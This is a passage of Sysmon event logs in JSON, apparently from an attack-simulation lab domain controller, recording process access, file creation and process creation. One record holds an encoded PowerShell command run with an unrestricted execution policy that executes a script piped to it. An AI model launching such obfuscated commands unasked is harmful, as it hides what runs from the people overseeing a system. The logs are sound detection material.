Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.615","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001036DE0600}","SourceProcessId":"4852","SourceThreadId":"4820","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.615\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nProcessId: 2872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_co3ns153.id2.ps1\r\nCreationUtcTime: 2020-08-01 06:55:00.615","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.615","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_co3ns153.id2.ps1","CreationUtcTime":"2020-08-01 06:55:00.615","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.646\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.646","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.646\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nTargetProcessId: 2872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.646","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","TargetProcessId":"2872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.714\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-00103DF60600}\r\nProcessId: 1004\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nParentProcessId: 2872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.714","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-00103DF60600}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","ParentProcessId":"2872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.709\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001011EA0600}\r\nSourceProcessId: 2872\r\nSourceThreadId: 4492\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-00103DF60600}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+df4d934b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a425|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a0f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+df42b50b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de93ac8c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de99915b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97c7c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97c7c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97c651|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de96e5d6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97ab09|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a6fc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a425|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a0f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+df42b50b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de960f57|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de960527","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.709","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001011EA0600}","SourceProcessId":"2872","SourceThreadId":"4492","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-00103DF60600}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+df4d934b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a425|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a0f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+df42b50b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de93ac8c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de99915b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97c7c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97c7c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97c651|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de96e5d6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+de97a